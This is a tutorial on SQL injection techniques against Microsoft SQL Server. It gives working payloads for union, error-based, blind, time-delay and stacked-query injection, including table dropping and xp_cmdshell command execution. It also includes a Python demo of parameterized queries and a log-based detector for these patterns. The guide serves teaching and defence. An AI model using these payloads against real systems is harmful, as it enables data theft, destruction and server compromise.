Microsoft SQL Server

Context

This guide is designed to teach specific SQL injection techniques on Microsoft SQL Server. It assumes that the reader has a working knowledge of the SQL language, database schemas, HTTP requests, and general SQL injection methods.

Theory

Microsoft SQL Server Default Databases

Microsoft SQL Server comes with several default databases, such as master, model, msdb, tempdb, and northwind. These default databases can often reveal sensitive information if they are improperly secured. They contain system-wide configuration settings and metadata about all other databases on the server, which could be leveraged for further exploitation.

SQL Comment Syntax in MSSQL

In Microsoft SQL Server, single-line comments begin with -- and run to the end of the line, and multi-line comments are enclosed within /* */. Attackers use comments to truncate the remainder of a query, so that everything the application appends after the injection point, such as a closing quote or further WHERE conditions, is ignored and the SQL execution path is manipulated for injection purposes.

Enumeration Techniques in MSSQL

Enumeration in MSSQL involves gathering information about the database structure and metadata. This is typically done using built-in functions and system views. Functions like DB_NAME() and SCHEMA_NAME(), along with system views such as information_schema.tables, facilitate the enumeration of databases and their structure. Knowing the schema and tables is what turns a confirmed injection into targeted data access.

Version and Server Property Enumeration

Enumerating version and server properties is an important step in planning attacks, as it provides insights into potential vulnerabilities based on the server version and configuration. Microsoft SQL Server provides functions such as @@version and SERVERPROPERTY() to retrieve version information and server properties; this helps attackers tailor their exploits accordingly.

String Aggregation and Object Identification

Functions like STRING_AGG() (available from SQL Server 2017 onwards) and OBJECT_ID() are used in data retrieval and object identification. STRING_AGG() concatenates many rows of query results into a single string, which can be helpful in blind SQL injection attacks where only one value can be extracted per request, while OBJECT_ID() allows attackers to confirm the existence of a particular database object.

Practice

Union-Based SQL Injection

Union-based SQL injection exploits vulnerabilities by appending additional SELECT queries using the UNION SQL operator. It enables attackers to retrieve data from other tables where data types match.

  • Command:

    SELECT column1, column2 FROM table UNION SELECT NULL, @@version --

    This retrieves the SQL Server version string through the UNION operator; the injected SELECT must match the original query's column count and data types.

  • Command:

    SELECT column1, column2 FROM table UNION SELECT NULL, DB_NAME() --

    This enumerates the name of the current database.

Outcome: Successful execution reveals the database version and names, helping map the database environment.
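The following Python script is an added example and is not part of the original guide. It shows why the UNION payload above succeeds when the application builds its query by string concatenation, and why the same input is harmless when the value is passed as a bound parameter. An in-memory SQLite database stands in for SQL Server so the script runs offline, sqlite_version() stands in for @@version, and the products table with its two rows is constructed sample data.

```python
import sqlite3


def make_db():
    """Build an in-memory database with constructed sample rows (SQLite stands in for MSSQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, price TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [("widget", "9.99"), ("gadget", "19.99")],
    )
    return conn


def lookup_unsafe(conn, name):
    """Vulnerable pattern: user input is concatenated into the statement text."""
    sql = "SELECT name, price FROM products WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Hardened pattern: the value travels as a bound parameter, never as SQL text."""
    return conn.execute(
        "SELECT name, price FROM products WHERE name = ?", (name,)
    ).fetchall()


# Same shape as the guide's UNION payload; sqlite_version() replaces @@version
# because SQLite has no @@version. The trailing -- comments out the closing quote.
UNION_PAYLOAD = "x' UNION SELECT NULL, sqlite_version() --"


def demo():
    """Return (rows from the vulnerable query, rows from the parameterized query)."""
    conn = make_db()
    leaked = lookup_unsafe(conn, UNION_PAYLOAD)   # one extra row: (None, '<version>')
    blocked = lookup_safe(conn, UNION_PAYLOAD)    # no product has that literal name: []
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("concatenated query returned:", leaked)
    print("parameterized query returned:", blocked)
```

With a real SQL Server driver such as pyodbc the hardened form is the same idea: pass the value in the parameter tuple of execute() instead of formatting it into the statement, so the driver sends it as data and the UNION never becomes part of the parsed SQL.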

Error-Based SQL Injection

Error-based SQL injection uses SQL errors to gather database information.

  • Command:

    SELECT 1/0 FROM table --

    This triggers a divide-by-zero error; if the message is returned to the client, it confirms that injected SQL is being executed and may reveal information about the database.

  • Command:

    SELECT CAST((SELECT @@version) AS INT) --

    Forces a data type conversion error whose message contains the SQL Server version string.

Outcome: Database error messages returned to the client reveal sensitive system information to the attacker.

Blind SQL Injection

Blind SQL injection relies on evaluating conditions whose True/False outcome is visible in the application's behaviour, allowing the database structure to be inferred one question at a time.

  • Command:

    SELECT CASE WHEN (SELECT COUNT(*) FROM information_schema.tables) > 0 THEN 1 ELSE 1/0 END --

    Returns 1 when the database has at least one table and raises an error otherwise; comparing the count against different thresholds is how the number of tables is inferred.

  • Command:

    SELECT CASE WHEN (SELECT SYSTEM_USER) = 'sa' THEN 1 ELSE 1/0 END --

    Checks whether the current login is the 'sa' account by making the query fail when the condition is false.

Outcome: Provides an inferential channel for recovering database structure and user information without any data being displayed directly.

Time-Based Blind SQL Injection

Time-based techniques introduce delays to infer query results when the application shows no visible output and no error messages.

  • Command:

    WAITFOR DELAY '00:00:05' --

    Introduces a five-second delay, so the response time becomes the inference channel.

  • Command:

    IF (SELECT SYSTEM_USER) = 'sa' WAITFOR DELAY '00:00:05' --

    Tests whether the current login is 'sa' by delaying the response only when the condition holds.

Outcome: Deduces information about user roles and database state through time-based inference.

Stacked Query Injection

Stacked queries exploit the ability to execute multiple SQL statements in one request by separating them with a semicolon.

  • Command:

    SELECT 1; DROP TABLE test --

    Allows execution of additional statements, such as dropping a table.

  • Command:

    SELECT 1; EXEC xp_cmdshell 'dir' --

    Executes operating system commands through extended stored procedures such as xp_cmdshell, which is disabled by default and requires elevated privileges to enable.

Outcome: Enables arbitrary SQL execution and, where xp_cmdshell is enabled, operating system command execution, escalating from database to server-level compromise.
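The signatures that run through the Practice section above (UNION SELECT, @@version and SERVERPROPERTY() probes, CAST(... AS INT) conversion errors, CASE WHEN ... 1/0 boolean tests, WAITFOR DELAY, stacked statements and xp_cmdshell) can be turned into detection logic. The following Python script is an added example, not part of the original guide: it parses constructed web-server access-log lines (the line format, client addresses and response times in milliseconds are assumptions), URL-decodes each query string, flags the patterns just listed and, for requests carrying WAITFOR DELAY, also records whether the response actually took longer than a threshold, which is the time-based signal a defender can correlate.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not real traffic): client IP, request line, status, latency in ms.
SAMPLE_LOG = """\
10.0.0.5 "GET /products?id=42 HTTP/1.1" 200 31
10.0.0.9 "GET /products?id=42%27%20UNION%20SELECT%20NULL%2C%40%40version%20-- HTTP/1.1" 200 44
10.0.0.9 "GET /products?id=42%27%20AND%201%3DCAST%28%28SELECT%20%40%40version%29%20AS%20INT%29%20-- HTTP/1.1" 500 38
10.0.0.9 "GET /products?id=42%3B%20WAITFOR%20DELAY%20%2700%3A00%3A05%27%20-- HTTP/1.1" 200 5072
10.0.0.9 "GET /products?id=42%3B%20EXEC%20xp_cmdshell%20%27dir%27%20-- HTTP/1.1" 200 120
10.0.0.7 "GET /search?q=union%20station HTTP/1.1" 200 27
"""

# Assumed log layout: <ip> "<method> <target> <protocol>" <status> <milliseconds>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<ms>\d+)$'
)

# One rule per technique from the guide; names are used in the findings.
RULES = [
    ("union_select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("version_probe", re.compile(r"@@version|serverproperty\s*\(", re.I)),
    ("cast_error", re.compile(r"\bcast\s*\(.*\bas\s+int\b", re.I)),
    ("boolean_case", re.compile(r"\bcase\s+when\b.*\b1\s*/\s*0\b", re.I | re.S)),
    ("waitfor_delay", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("stacked_exec", re.compile(r";\s*(exec(ute)?|drop|alter|insert|update|delete)\b", re.I)),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    # A bare trailing comment is noisy on its own, so it only counts alongside another rule.
    ("comment_terminator", re.compile(r"--\s*$")),
]


def parse_line(line):
    """Split one log line into its fields; the query string is decoded twice to undo double encoding."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {
        "ip": m.group("ip"),
        "path": path,
        "query": unquote_plus(unquote_plus(query)),
        "status": int(m.group("status")),
        "ms": int(m.group("ms")),
    }


def classify(entry, delay_threshold_ms=4000):
    """Return the names of every rule that matches the decoded query string."""
    hits = [name for name, rx in RULES if rx.search(entry["query"])]
    # Time-based probe that really did stall the server: the strongest signal in the set.
    if "waitfor_delay" in hits and entry["ms"] >= delay_threshold_ms:
        hits.append("delay_observed")
    return hits


def scan_log(text, delay_threshold_ms=4000):
    """Return one finding per request that matches at least one substantive rule."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry, delay_threshold_ms)
        if any(h != "comment_terminator" for h in hits):
            findings.append({**entry, "rules": hits})
    return findings


def summarize(findings):
    """Count findings per client IP, the first thing an analyst pivots on."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["ms"], f["rules"], f["query"])
    print(summarize(scan_log(SAMPLE_LOG)))
```

The benign search for "union station" is deliberately included: the UNION rule requires a following SELECT, which is why keyword-only matching is a poor detector. In production these rules belong in a WAF or SIEM rule set, with the delay correlation fed from the web server's own response-time field.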

Tools

  • sqlmap
  • Burp Suite
  • Nmap
